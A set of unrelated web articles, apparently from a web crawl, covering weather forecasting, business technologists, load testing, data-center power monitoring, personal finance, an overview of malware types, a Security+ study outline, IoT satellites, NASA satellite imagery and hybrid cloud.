What’s next? The Weather Company will not only improve weather predictions to help people and communities better plan for upcoming weather conditions but will also help millions of industries such as retail, utility, aviation, insurance, airlines and others. In terms of airlines, IBM GRAF will be able to provide more effective routes around turbulence. As Todd Hutchinson explains: “We will diagnose turbulence using output from GRAF in order to provide forecasts of where turbulence is likely to occur, so that airlines have the opportunity to route around areas of expected turbulence.”
The Weather Company
The Weather Company is an IBM business – bringing together IBM’s advanced AI and cloud capabilities with The Weather Company’s high volume of weather data. This powerful combination helps people, businesses and communities around the world prepare for and mitigate the cost of weather. The company offers the most accurate weather forecasts globally–more than 25 billion per day–with personalized and actionable weather data and insights. The Weather Company is committed to trust and transparency, and The Weather Channel app and weather.com, as well as Weather Underground and wunderground.com are trusted by hundreds of millions of people to provide accurate, timely forecasts that help them make critical decisions every day. For more, visit https://newsroom.ibm.com/the-weather-company
Take the next step with the IBM GRAF weather model
To learn more about IBM Power System AC922 with NVIDIA GPUs, please contact your IBM representative or IBM Business Partner, or visit the following website: https://www.ibm.com/us-en/marketplace/power-systems-ac922. Or, read more client success stories to learn how others have put IBM’s solutions to use and got major results. | <urn:uuid:ccac7662-0961-47ee-b78d-a6e59c9a649e> | CC-MAIN-2022-40 | https://www.ibm.com/case-studies/ibm-graf-from-the-weather-company | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00787.warc.gz | en | 0.93404 | 1,887 | 2.640625 | 3 |
In today’s fast-paced and highly competitive market, enterprises are looking for ways to gain an edge over their competitors through the use of technology in their businesses. Technology has become so sophisticated and ubiquitous that it is nearly impossible for enterprises to be successful without using technology to its full potential. To bridge the gap between business and technology, an enterprise needs the expertise of a business technologist.
Who is a Business Technologist?
A business technologist is an IT (information technology) professional with a combination of broad general knowledge of technology along with soft skills and business skills. Most importantly, they have a deep understanding of how to integrate technology into strategies that align with business outcomes and drive competitive advantage.
The basic concept behind a business technologist is a hybridized talent of sorts. You need to be skilled at both technology and business, and those skills need to work in tandem with one another. At their core, some business technologists are citizen developers—employees who don’t just consume technology but can also create it. While not all business technologists are citizen developers, all citizen developers are business technologists. These professionals have technical skills as well as industry-specific knowledge; they not only understand how to develop tools but know what to develop for particular business needs using low-code development tools or APIs (application programming interfaces).
What Does a Business Technologist Do?
An experienced business technologist can help move an enterprise forward by increasing collaboration among departments and streamlining workflow, all while reducing costs by making technology more efficient and scalable. Here are some functions of a business technologist.
Monitoring industry trends and developments
A business technologist may not spend all day keeping up with industry trends and developments. However, they regularly monitor publications related to their field of expertise to stay abreast of any changes in relevant laws, regulations, case law, scientific developments, and more that might affect potential business operations.
Understanding how technology impacts different industries and sectors
Understanding key differences between industries, sectors, and enterprises allows them to shape technology proposals to their specific needs and ensure full alignment with business strategy.
Envisioning the future of technology for their company and redefining business processes
A business technologist envisions new ways to use technology in their enterprise and create systems that can improve efficiency and effectiveness over time. They also redefine business processes, so they are able to incorporate new technologies or leverage existing ones in novel ways to make certain activities more streamlined and efficient.
Advising top management on potential technology investments
Since they understand how best to apply new technologies to different business functions, they can advise top management about whether it makes sense for them to invest in certain products or services at different points along their lifecycle.
Why They Are Needed
The proliferation of powerful technologies has led to a culture shift in how technology is leveraged within organizations. This has been dubbed the age of democratized technology, where a once-complicated developer skill set is becoming accessible to all. It’s now possible for citizen developers (regular businesspeople) to download powerful applications and frameworks, then utilize these tools to create customized solutions that meet their needs without needing technical assistance from IT professionals. This cultural shift has created an increased need for those with access to business and technology knowledge (business technologists) to integrate technology into effective business processes.
How Enterprises Can Benefit from Having Business Technologists
Business technologists can improve productivity, efficiency, and decision-making capabilities by unifying enterprise systems. Not only do business technologists have a holistic view of how technology supports an organization’s goals, but they also keep up with technological innovations to anticipate needs for future business operations.
A business technologist focuses on applying technology as a key enabler for delivering better customer outcomes, reducing costs, increasing efficiencies, and improving employee satisfaction within a business environment. This value proposition is what differentiates business technologists from other professionals who work in IT.
What Skills Do Business Technologists Need?
Business technologists must have the following qualities:
- Big-picture outlook: They have the ability to see how technology can be applied across an entire business in order to optimize efficiency, from marketing and sales to client and partner management, product development, and delivery.
- Data cruncher: They are someone who really understands numbers, crunching raw data into valuable information about customers and markets for both strategic decisions and tactical campaigns.
- People person: A business technologist has a strong sense of what motivates others within a business environment and helps ensure smooth execution.
- Ideation: They have the ability to bring creativity to projects through brainstorming sessions and idea creation; they foster creativity among team members with inspiring leadership abilities.
- Long-term vision: They can predict which technologies will become outdated, so they don’t waste resources developing them now.
- Knowledge of technology and digital media: A business technologist should understand how both core systems work as well as each major application solution that runs on top of those core systems (e.g., customer relationship management, enterprise resource planning, marketing automation, accounting solutions, etc.). Business technologists should be able to identify what a business problem is or could be and formulate a solution on how that could be solved by better integrating all these applications together or leveraging more streamlined solutions which meet most, if not all, requirements already available in the marketplace.
- Understanding of process flow and methodologies: A business technologist should know about how complex processes operate in businesses across all industries from finance to human resources, marketing, research & development, etc.
The Future of Business Tech in an Enterprise
The pace of change in business has accelerated to such a degree that business technologists will become an indispensable resource in order for organizations to keep up with new developments and technology trends. This is true whether you’re an entrepreneur starting out or a seasoned CEO trying to navigate through a shifting economy.
The reality is that over time, almost every industry will be transformed by digital disruption as entire marketplaces appear and evolve so quickly that their lifespan becomes nearly nonexistent. In order to stay ahead of these challenges—and harness them—business leaders need skilled technologists who can partner with them to stay abreast of changes and pivot when necessary.
Today, businesses need someone whose expertise cuts across different platforms, such as cloud computing, enterprise social networks, app development, data analytics, and more. More importantly, they must have experience strategizing with senior leadership, showing how each piece of emerging technology can make an impact in an enterprise. Every enterprise needs a digital game plan today if they want to compete tomorrow—and having a business technologist can help lead your enterprise there.
Read next: Top 10 In-Demand IT Certifications 2021 | <urn:uuid:c20456ab-6b93-4115-ac45-a602c3cef9ae> | CC-MAIN-2022-40 | https://www.itbusinessedge.com/business-intelligence/why-business-technologists-are-becoming-indispensable/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00787.warc.gz | en | 0.948064 | 1,373 | 2.640625 | 3 |
Before a software product can be brought to market, it must go through numerous tests to determine if it is working correctly. Some common types of software tests include bug tests, performance scans, and functionality verification. Load testing is one of the most common software tests run on systems and applications. So what is load testing? We’re glad you asked.
What is Load Testing
Load testing is a type of system test that determines how well an application or system performs under normal or anticipated peak conditions. Software load tests send virtual users or requests to the system to determine how well it handles the traffic/requests.
Load testing is similar to stress testing. Stress testing, however, pushes the product past anticipated limits to determine the maximum number of users or requests a product can handle before it breaks. Stress tests take it past expected levels into the realm of unrealistic demands. Load testing only pushes the product to within expected or peak capacity levels. Load testing must take place near the end of the development cycle. Essentially, a system can’t be tested from the end-user perspective until it’s complete.
Why is Load Testing Important
Load testing mimics the way a system or application acts when deployed as a finished product. It helps developers determine if the system behaves as intended. It can also help identify issues like pages not loading correctly, lag time, downtime, and overall performance problems.
Companies must protect their brands. They should never deploy an application or system that isn’t working well. If you launch a website, it should work right for everyone. You don’t want it to crash when the 1,000th person visits the site lest your company look bad or unreliable. The purpose of load testing is to help a company determine if the system or app is ready to deploy and that it can handle all anticipated traffic.
Load testing finds issues before the product hits the market, which gives developers the time they need to correct them. Retesting must occur every time the software changes.
Consider Outsourcing Your Load Testing Needs
Outsources QA teams are an excellent option for organizations that don’t have the resources necessary to keep meet the demands of quality assurance testing. Qualified quality assurance testing labs understand what is load testing and why it is so vital to growing websites.
iBeta Quality Assurance can work within your development and testing cycles. We have an extensive infrastructure perfect for load testing, which we use to determine if your product can handle everyday stress. Click here to learn more about our Load/Performance Testing services. | <urn:uuid:826a3d35-197c-4ff0-895c-0ad639c04315> | CC-MAIN-2022-40 | https://www.ibeta.com/what-is-load-testing-and-why-is-itnecessary/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00787.warc.gz | en | 0.918037 | 520 | 2.53125 | 3 |
Power Density In the Past
Here’s How it Works
Evolution of Power Density and Data Center Energy Consumption
Let’s take a look at historical data center energy use.
Challenges with Increasing Power Density
Power And Cooling
CPU consumption will grow as real servers become overburdened with virtual machines. The increased power demand can average approximately 20% when these devices go from 5-10% utilization up to 50% of utilization. This power consumption can be increased even further by the additional CPU and memory utilization.
In the data center, virtualization has created several new issues. High-density cabinets now require more power than traditional low-density. Due to the increased power consumption, electricians need to rewire cables to accommodate the capacity load. Or, it is smarter to migrate your load into a much-equipped data center.
Because of the increased power density in data centers as a result of virtualization, cooling issues may arise. High-density machines may generate more heat in a smaller space, making it more difficult to disperse. Hotspots in your data center may come out as a result of this.
AKCP Power Monitoring
AKCP, the world’s oldest and largest supplier of networked wired and wireless sensor solutions, has launched a free online PUE calculator to check your data center efficiency and identify potential savings.
Power Usage Effectiveness (PUE) is a popular metric that measures how efficient your data center operation is. It’s a ratio of the amount of energy spent on cooling vs the amount of energy spent on the IT load. A PUE of 1.0 means your data center runs on totally free cooling. A PUE of 2.0 means you spend an equal amount of energy on cooling as you do on IT load.
A well-designed and run data center can obtain a PUE of 1.2 – 1.3. However, most smaller edge data centers and in-house computer rooms have PUE numbers of 2.0 and above.
AKCPro Server is an ideal DCIM solution. Perfect for those people who don’t have the budget or need for complex DCIM software, but require a capable monitoring system for their data center. With many advanced features such as Cabinet Thermal Mapping, Drill Down Mapping, Graphing, VPN connections to remote sites, AKCPro Server is the ideal choice. AKCPro Server is capable of live PUE calculations, so you can see real-time the effect of the changes you make on your PUE.
Power Monitoring Sensor
The AKCP Power Monitor Sensor gives vital information and allows you to remotely monitor power. This eliminates the need for manual power audits as well as provides immediate alerts to potential problems. The AKCP Power Monitor Sensor is specifically designed to be used with AKCP sensorProbe+ and securityProbe base units. It has been integrated into the sensorProbe+ and securityProbe web interface with its own “Power Management” menu, allowing multiple three-phase and single-phase Power Monitor Sensors to be set up on a single sensorProbe+ or securityProbe depending on which readings are required. Please check the sensorProbe+ Modbus manual or the PMS manuals on our website for more detailed information on this. Power meter readings can also be used with the sensorProbe+ and AKCPro Server lives PUE calculations that analyze the efficiency of power usage in your data center. Data collected over time using the Power Monitor sensor can also be viewed using the built-in graphing tool.
Avoid Hotspots with AKCP
The AKCPro airflow sensor is designed for systems that generate heat in the course of their operation. So, a steady flow of air is necessary to dissipate this heat. System reliability and safety could be jeopardized if this cooling airflow stops.
The Airflow sensor is placed in the path of the air stream, where the user can monitor the status of the flowing air. The airflow sensor is not a precision measuring instrument. This device is meant to measure the presence or the absence of airflow.
Cabinet Analysis Sensor
Airflow and Thermal Mapping for IT Cabinets
The Cabinet Analysis Sensor (CAS) features a cabinet thermal map for detecting hot spots and a differential pressure sensor for analysis of airflow. Monitor up to 16 cabinets from a single IP address with the sensorProbeX+ base units. The Wireless Cabinet Analysis Sensor is also available using our Wireless Tunnel™ Technology.
Differential Temperature (△T)
Cabinet thermal maps consist of 2 strings of 3x Temp and 1x Hum sensor. Monitor the temperature at the front and rear of the cabinet, top, middle, and bottom. The △T value, front to rear temperature differential is calculated and displayed with animated arrows in AKCPro Server cabinet rack map views.
Differential Pressure (△P)
There should always be a positive pressure at the front of the cabinet, to ensure that air from hot and cold aisles is not mixing. Air travels from areas of high pressure to low pressure, it is imperative for efficient cooling to check that there is higher pressure at the front of the cabinet and lower pressure at the rear.
Rack Maps and Containment Views
With an L-DCIM or PC with AKCPro Server installed, dedicated rack maps displaying Cabinet Analysis Sensor data can be configured to give a visual representation of each rack in your data center. If you are running a hot/cold aisle containment, then containment views can also be configured to give a sectional view of your racks and containment aisles. | <urn:uuid:77142ac2-c0f7-4e83-8976-8de0247fbe90> | CC-MAIN-2022-40 | https://www.akcp.com/articles/power-consumption-and-power-density/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00787.warc.gz | en | 0.903839 | 1,160 | 2.578125 | 3 |
Let’s begin with defining Finance, “It is a comprehensive phrase that fully specifies explicit activities linked with banking, leverage or debt, credit, capital markets and investments, basically, it reflects the entire money management and the procedure of obtaining money according to requirement. However, Finance comprises monetary learning, and the study of banking, credit, investment, equities, and liabilities that entirely build the financial structure.”
Finance is an extremely important aspect in everybody life, but do you want to know how it is manageable and doable at a corporeal grade, or simply at the personal stage, probably, you would say "yes". So, Without further delaying, voyaging the Personal Finance monarchy
Table of Content
- Introduction to Personal Finance
- Importance of Personal Finance
- Types & Examples
- Process & Strategies
Introduction to Personal Finance
A generic definition of personal finance is, “maintaining your own money throughout your life.” However, the authentic interpretation incorporates all the features and aspects of managing the income including various strategies and status of risk for distinct facets of life and different amounts of investments.
In simple words, “It involves the understanding of the facts like how everyday spending affects our accounts, the utility of credit cards, how varying interest rates could make or break our portfolios”. These fundamental concepts assist in framing a picture of how stable an individual is financially and more importantly how to raise that stability in the future.
“Personal Finance is made up of various parts, but can be summarized as budgeting, setting spending and saving priorities, cash flow planning, and efficiently maximizing benefits through rewards programs.” – Anthony G. Lanza, Spectra Investment Management
It's all about actualising personal financial objectives whether it is adequate savings for short-terms financial demands, retirement planning, savings for kid’s education, etc. It completely relies on one’s income, expenditures, living expenses and requirements, essential demands, the individual targets along with the decisions made for meeting these targets within financial confinements.
Some practical examples of personal finance are;
Learning how to budget, balance a cheque book, secure funds for important purchases, saving for retirement, planning for taxes, insurance purchasing and making efforts for investments.
Planning with the family on how the total income could be divided for mortgage or kid’s education, medical expenses, etc.
Deciding or debating whether to save or not a particular amount on some expenditures or save it for the future.
According to the definition provided by Investopedia, “Personal finance explains all the financial decisions and actions accounted by an individual or household that comprise budgeting, insurance, mortgage planning, savings and retirement planning.”
Primarily, personal finance deals with
- Family budgets,
- Personal savings and investments, and
- The utilization of credit cards.
Most of the Individuals certainly get mortgages from commercial banks, savings and loan associations in order to purchase their own homes, while financing the purchase of consumer items such as automobiles or appliances can be collected from banks and finance firms.
Additionally, charge accounts and credit cards are other significant modes by virtue of which most banks and businesses render short-term credits to consumers.
(Recommended blog: 5 Key Elements of Financial Analysis)
Personal Finance Terms
Budget: While managing personal finances, budget is important in maintaining the record of spending patterns, it helps in planning how one could go with spending according to the income each month. It basically tells where is your money is going, when and where you can save, and how can you manage expenditures.
Insurance: In terms of managing personal finances, taking up the insurance is another part. One can protect itself via purchasing health insurance, life-term insurance, car insurance, etc, from risk and providing securities to material things also.
Savings: In our 20’s we just learn about personal savings, but with the entering in our 30’s we start planning about managing our funds, seek ways to invest correctly and save for retirement or old ages. Hence, it becomes necessary to make emergency savings funds to mask any financial discomforts and retirement saving plans to aid in future.
Importance of Personal Finance
Personal Finance has become an integral part of human life, and in the present COVID-19 world, it has become more necessary than ever before. (Click here to understand the concept of how COVID-19 is impacting Financial Markets)
Below are some of the imperative aspects of finance at a personal level;
Personal Finance has a great role in determining the direction and essence of human life in the prevailing economic and social circumstances.
For personal growth of an individual and his family, personal finance plays a key role by looking at the opportunities and keeping upgraded across the globe through keeping aware of any sort of risks.
It has become more crucial to enrich the financially literate in order to acquire most of the income and needed savings where the study of personal finance assists in distinguishing amid favourable and cheap financial decisions and also help in making savvy conclusions.
Some of the seminaries are providing classes about managing money, therefore, it is important to have basic knowledge through free online courses, articles, blogs and podcasts.
In addition to that, a novel concept, small personal finance incorporates augmenting strategies, these strategies consist of budgeting, preparing emergency funds, clearing off debt, carefully leveraged credit cards, saving for retirement, and etc.
In addition to that, knowing the fundamentals of personal finance from savings accounts to budgeting can help us in constructing a better future by eliminating the various risks.
(Related blog: An Introduction to Financial Analysis)
What are the Personal Finance Principles?
When a person thinks to manage his/her money, one of the finest approaches is “saving”, it can be strictly followed, “more you save, more you have”. However, principles that help to maintain success in business are discussed below;
Assessment: The key requirement for professionals that resist them spreading too much. However, enthusiastic persons have always listed various ideas and ways that touch their financial needs, either it is a side business or investment idea at the appropriate time.
Understating to restraint expenditure on non-profitable assets until a person has secured his monthly savings or debt-reduction aims is important in keeping net worth. Restraint is simply the way of managing a successful business, applied to personal finance as well.
(Recommend blog: Fundamental Analysis Guide)
Besides that, one should follow the saying, “never work for money, make your money works for you”, therefore, produce multiple, but legitimate, ways to have more source of income. Also, it is advisable to make you educated with financial terms and keep updating yourself to have a precise understanding of your financial matters and make accurate decisions for yourself.
Personal Finance: Principles and Types
What are the Types of Personal Finance?
Some types of personal finance can be accomplished as;
- Banking, that depicts the fundamental banking functionalities of managing accounts and transactions assistance.
- Investment, that is made by judging the entire alternatives and picking out the suitable path which provides the acceptance of a specific measure of risk, like the investment in real estate, stock market, fixed deposit, etc.
- Mortgages and loans, that signifies the assistance and services letting a person leverage and obtain an asset for getting its objective. For example, acquiring a home loan or education loan for fulfilling his aspirations.
- Expert advice or counselling, that can be gained for analyzing the exact picture and getting the actual perspective of the situation to catch. Along with this, it serves as a guiding tool and the latest outlook.
Process of Personal Finance
Simply, the process of personal finance can be explained as follows;
Studying the current condition: Figuring out the exact existing conditions in terms of where we stand, how the current situation is being handled in order to acquire a precise knowledge of the strengths and weaknesses.
Preparing up doable goals: Setting up objectives according to the preferences is necessary for deciding in which direction the next step should be placed, or where an individual should move forward in future.
Determining all courses of actions: Pinpointing the required plan and process should be captured in the current scenario and analysing the time-frame work, expenses, and opportunities interconnected with each and every individual subject of actions.
Checking out the alternatives: Deciding the full recognized alternatives and checking the pros and cons provided the inadequacy of resources. Also, selecting the alternative through moderating the perils to a satisfactory level.
Applying a suitable area of action: It is a high time to seize an action, making the investments and performing the conventionalities.
Following up is pivotal: The necessary step is to follow up. Since the conditions are altering elementary and in the terms of changing environment, one should be dynamic adequately and should analyze the options from time to time in order to obtain the best results.
Personal Finance Strategies
Some top-notch personal finance strategies to follow;
Planning for a budget is a very important task and evaluating how much amount should be spent on which activities. For example, some fraction of total income must be expended on essential activities like rent, groceries, and how much should be spent on convenience and savings.
With the holding of a credit card, one can get spur-of-the-moment purchases that yield in trapping in its own frame. Therefore, wisely implementation of credit cards is imperative in order to avoid ample troubles.
In addition to that, the conceptual knowledge of credit score is important. One should maintain a satisfactory credit score that supports in sustaining high-grade creditworthiness.
One of the important viewpoints is mitigating the debt, this is considered as the best approach in propelling a step ahead.
Considering the factor of retirement policy and planning is worthy. Initiating by implanting or investing appropriately and making scopes or expenses for retirement.
Understanding and acquiring the tax system of an individual’s country could aid in a vast portion of savings by making correct tax planning, expert advice is also beneficial to the regard.
Having suited insurance is a key ingredient in case of emergency and to avoid unexpected loss and concussions.
The last but most important strategy is having savings for emergency conditions including medical bills, a big loss like accidents etc. (In reference with)
(Also check: Financial Analysis: Types, Examples and Techniques)
In today’s environment, financial management has turned out to be the utmost significance. There are plenty of options available to professionally manage all personal finances and banking, even most of the banks are rendering such services where they can manage money successfully.
Presently, personal finance is a very broad realm in itself. It can be concluded that Personal finance could be addressed as the management of money and financial decisions for an individual or for a family covering budgeting, retirement planning and investments.
“Being promoted to a top position in your organization, or even being elected to public office, does not suddenly endow you with financial literacy, if you did not acquire and develop it, earlier in your life.” – Strive Masiyiwa, founder of Econet Wireless
In spite of all the reliable resources, it is advisable to account for a worthwhile personal finance approach. One should be prudent enough to obtain finance literary knowledge in order to make acceptable decisions in this direction while maintaining money adequate. | <urn:uuid:8ee29f3d-d114-4499-8df1-122b759e683f> | CC-MAIN-2022-40 | https://www.analyticssteps.com/blogs/what-personal-finance-importance-types-process-strategies | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00787.warc.gz | en | 0.934798 | 2,402 | 3.4375 | 3 |
Malicious software, or malware for short, is used by cybercriminals in a wide variety of campaigns and strategies involving extortion and data theft, among other misdemeanours. Malware comes in many forms, each with its own purpose and attack vector. Today, we’re going to explore some of the different threats enterprises should be aware of:
Ransomware is a kind of crypto malware. It employs encryption in order to disable a firm’s access to its own data. The target organisation may be rendered totally or partially unable to function until it pays the requested ransom. However, no guarantee exists that paying will result in the firm receiving the decryption key necessary to access files and systems once more.
Worms are aimed at OS vulnerabilities that allow them to install themselves inside networks. They can gain access by several avenues like via flash drives, backdoors and unintentional weaknesses in software. Once installed, threat operators use worms to steal data, launch ransomware or conduct DDoS attacks.
Trojan are malicious programs disguised as authentic software or useful code. Once unsuspecting users download it, the Trojan takes control of a victim’s device or system. They can be hidden in apps, games and software patches, or simply embedded in email attachments as part of phishing scams.
Computer viruses are a kind of code that can insert itself into an app. They then execute when the application is run. From inside the network, a virus can launch attacks like worms, cause chaos for companies or steal private data.
Spyware is designed to gather information about victims without them ever knowing. Once installed on a user’s device it can collect a wide range of data and transmit it back to a threat operator. This information may include a users’ online activity and internet surfing habits, but can also include their unstructured messages, payment details, personal pin numbers, log in and password data.
It is worth noting that the use of malicious spyware is no longer limited to simply desktop browsers it can also infect other user interfaces like critical applications and devices such as smartphones.
Finally, fileless malware does not initially install anything on company devices and systems; it instead makes alterations to existing files that are native to a device’s operating system. Examples include WMI and PowerShell. Due to the fact that the operating system recognises the altered files as authentic, this fileless attack cannot typically be caught by common types of antivirus software. Furthermore, because of the stealthy nature of these malicious attacks, they are around 10 times more likely to be successful than conventional malware attacks.
At Galaxkey, we specialise in providing cybersecurity solutions for enterprises seeking to keep the data they retain on record safe. From cutting-edge electronic signatures to powerful but easy-to-use encryption, our expertly developed platform provides companies with the specialist toolkit they need to protect sensitive content being stored or shared.
Why not contact us today for a free 14-day trial? | <urn:uuid:7aca3d67-2b0f-4731-a77e-e8ec140f7c3a> | CC-MAIN-2022-40 | https://www.galaxkey.com/blog/is-your-firm-malware-aware/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00787.warc.gz | en | 0.92501 | 630 | 3.21875 | 3 |
Security + new exam version is SY0-601. In this new version, we have 5 domains:
In this blog, we discuss domain 3.0 Implementation.
For a company’s security program, implementation is critical. It is the point at which a security system or technology comes into being, a new security effort is nothing but a collection of thoughts on a document if it isn’t put into action. In this domain, we cover 9 objectives and their subtopics.
The objectives covered in security+ domain 3.0 are listed below.
1. Implement Secure Protocols
Cyber attackers can take advantage of insecure protocols to damage data security and the integrity of systems. In this lesson, you’ll learn about some of the protocols and services that provide network hosts with addressing, name resolution, and monitoring. These protocols aren’t as visible as apps like web servers and email servers, but they’re essential for securing networks.
This lesson covers two parts: Protocols and Use case. Inside Protocols we learn Domain Name System (DNS), DNS Security Extensions (DNSSEC), Secure Real-time Transport Protocol (SRTP), File Transfer Protocol (FTPS), SSH File Transfer Protocols (SFTP), Understand Simple Network Management Protocol (SNMP) framework, Hypertext Transfer Protocol (HTTP), we can cover email service protocols, secure POP3 (Post Office Protocol v3), Secure IMAP (Internet Message Access Protocol v4). We understand Internet Protocol Security (IPSec) and its 2 Protocols:
In Use case part we learn how security protocols work inside this we cover:
2. Implement Host or Application Security Solutions
This lesson is concentrated on which security solutions are implemented for various hosts and applications. Inside this lesson, we cover Endpoint Protection, Boot Integrity, Application Security, Hardening.
In Endpoint Protection we can understand Antivirus and Anti-Malware, NGFW (Next-generation firewall), Host-based intrusion detection system (HIDS), Endpoint detection and response (EDR), Data Loss Prevention (DLP). Boot Integrity covers Boot Security, Unified Extension Firmware Interface (UEFI), work of Measured boot and Boot Attestation.
Inside Application security we learn Input Validation, Secure Cookies, HTTP Headers, we understand Allow list, Block list, Dynamic Code analysis.
3. Implement Secure Network Designs
Networks are as prevalent in the business as computers themselves. As a result, understanding secure network designs is essential for creating a protected network for your company. In this lesson we understand the working of Load balancing, Network segmentation, Virtual local area network (VLAN), we learn the difference between Extranet and Intranet. Cover the working of VPN (Virtual Private Network), DNA, also cover Network access control (NAC), Access control list (ACL). We will also understand the use of Port security.
4. Install and Configure Wireless Security Settings
Wireless security is becoming very important in the field of information security. In this lesson, we learn Cryptographic protocols, WiFi protected Access 2 (WAP2) and WiFi protected access 3 (WAP3), Simultaneous Authentication of Equals (SAE). We also cover Authentication protocols, Extensible authentication protocol (EAP), Protected Extensible Authentication Protocol (PEAP), IEEE 802.1X. We understand the Methods of configuring wireless security and Installation considerations, WiFi Protected Setup (WPS), Site surveys, WiFi analyzers, Wireless access point (WAP) placement.
5. Implement Secure Mobile Solutions
In this lesson, we will understand the concept of Connection methods and receivers. Inside this concept, we cover Cellular, WiFi, Bluetooth, NFC, Infrared, Point to Point, Point to multipoint. We learn Mobile device management (MDM), Application management, Content management, Remote wipe, Geofencing, Screen lock, Biometrics, Storage segmentation. We cover Deployment models, BYOD (Bring your own device), Corporate-owned personally enabled (COPE), Choose your own device (CYOD), Virtual desktop infrastructure (VDI).
6. Apply Cybersecurity Solutions to the Cloud
In this lesson, we will learn the use of Cloud security controls, Cybersecurity solutions, and Cloud-native controls vs third-party solutions. In Cloud Security controls we will cover several sub-topics like High availability across zones, Storage, Network, Compute. And inside Cybersecurity solutions, we cover Application security, Next-generation secure web gateway (SWG), Firewall considerations in a cloud environment.
7. Implement Identity and Account Management Controls
In this lesson, we will learn 3 topics: Identity, Account types, and Account policies. In the first topic Identity, we cover Identity providers (IdP), know about Identity Attributes, how the tokens are used, SSH keys, and Smart cards. In the second topic, we cover types of accounts, User account, Guest accounts, Service accounts. Inside Account policies, we cover Account permissions, Access policies, Password complexity, Time-based logins, Account audits.
8. Implement Authentication and Authorization Solutions
In this lesson, we will learn Authentication management, Password keys, Password vaults, TPM, Knowledge-based authentication. We will cover Authentication/authorization, inside this topic we will understand Challenge-Handshake Authentication Protocol (CHAP), Password Authentication Protocol (PAP), Terminal Access Controller Access Control System Plus (TACACS+), Kerberos, OpenID. We also cover Access control schemes and their subtopics Attribute-based access control (ABAC), Role-based access control, Rule-based access control, Privileged access management, Filesystem permissions.
9. Implement Public Key Infrastructure
In this lesson, we will cover the concept of Public key infrastructure (PKI), Key management, Certificate authority (CA), Certificate revocation list (CRL), use of Certificate attributes, Online Certificate Status Protocol (OCSP), Certificate signing request (CSR). We learn types of certificates, Wildcard, Subject alternative name, Code signing, Domain Validation, Extended validation. We also cover formats of certification and Concepts of certification changing, Key escrow, online vs offline CA.
Learn Security+ With Us
Infosec Train is a leading provider of IT security training and consulting organization. We have certified and experienced trainers in our team whom you can easily interact with and solve your doubts anytime. If you are interested and looking for live online training, Infosec Train provides the best online security+ certification training. You can check and enroll in our CompTIA Security+ Online Certification Training to prepare for the certification exam. | <urn:uuid:e59245cd-642c-482c-b227-dd6d0ff1277c> | CC-MAIN-2022-40 | https://www.infosectrain.com/blog/comptia-security-sy0-601-domain-3-implementation/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00787.warc.gz | en | 0.832004 | 1,385 | 2.65625 | 3 |
Canada-based Helios Wire is planning to launch 30 satellites into space in a bid to ‘democratize the Internet of Things (IoT) from space’.
Helios Wire says the satellites will be used to monitor five billion sensors on Earth in a bid to significantly reduce the cost of IoT.
Two satellites will be launched in 2018, with a further 28 launched over the following three years, for less than $100 million according to a report in the Vancouver Sun.
Will Helios Wire disrupt IoT?
The network will use 30 MHz of priority mobile satellite system (MSS) S-band spectrum to build a two-way global satellite-enabled system.
This is the same infrastructure used for enabling pan-European mobile services. Crucially, it allows for very low-cost short bursts of data to low-power devices – which could reduce the cost of IoT.
According to Helios’ website, the small transmitters on Earth will collect information such as location, infrastructure reliability, crop health, asset elevation, or almost any other digital information.
That information is then relayed up to the satellites. These satellites pick up the signals and data from the ground based transmitters and forward that down to antennas on the ground, where it is then uploaded to a cloud-based analytics platform that should allow for better information and decisions.
The technology to ‘democratize the IoT’
In comments made to the Vancouver Sun, Helios CEO Scott Larson said: “S-Band spectrum is really well-suited to short pings of data and it will allow us to connect a huge number of devices. It’s going to allow us to build out a space-enabled IoT network.”
Larson believes early adopters will be farmers using precision agriculture systems or utilities using smart meters.
He adds that “the system is particularly well-suited to monitoring things that are remote or moving over large distances,” which could prove useful for anything from emergency services personnel to conservation groups in Africa.
“Space is hard, but it’s getting easier and we think we have the technology now to really democratize the Internet of Things,” he finished.
Helios Wire has secured $1 million in initial funding, but will undertake several further financing rounds over the course of the coming year. | <urn:uuid:e1f8bc58-ce6e-439d-b087-edd3ce1e3e64> | CC-MAIN-2022-40 | https://internetofbusiness.com/helios-wire-democratize-iot-space/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337529.69/warc/CC-MAIN-20221004215917-20221005005917-00787.warc.gz | en | 0.93067 | 485 | 2.546875 | 3 |
The agreement extension will enable the agency to access the company's RapidEye and PlanetScope offerings to inform research projects in the coming months, Planet said Tuesday.
NASA employed PlanetScope in 2020 to assess landslide hazards in the Himalayas as well as the collapse of the last Arctic ice sheet. The agency also identified burned area models of wildfires and helped farmers in Africa seek watering holes for goats, donkeys and cattle using the satellite imagery from the technology.
Other collaborations include the company providing data to NASA to help track airport and traffic changes and explore the effects of the COVID-19 pandemic.
NASA's Harvest program also used satellite imagery to provide a country-wide cropland map to the Togolese government to support aid distribution efforts. | <urn:uuid:e55e4d31-da2b-4656-b39d-9481a3ebfdfa> | CC-MAIN-2022-40 | https://blog.executivebiz.com/2021/01/planet-nasa-extend-satellite-imagery-partnership/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00787.warc.gz | en | 0.909587 | 153 | 2.875 | 3 |
Hybrid Cloud Definition
Hybrid-cloud A hybrid cloud architecture is mix of on-premises, private, and public cloud services with orchestration between the cloud platforms. Hybrid cloud management involves unique entities that are managed as one across all environments.
What is Public vs. Private vs. Hybrid Cloud?
Innovations in the cloud have resulted in a move from single-user private clouds to multi-tenant public clouds and hybrid clouds. This evolution in cloud infrastructure has seen an increase in the use of hybrid cloud solutions. The cloud types have the following differences:
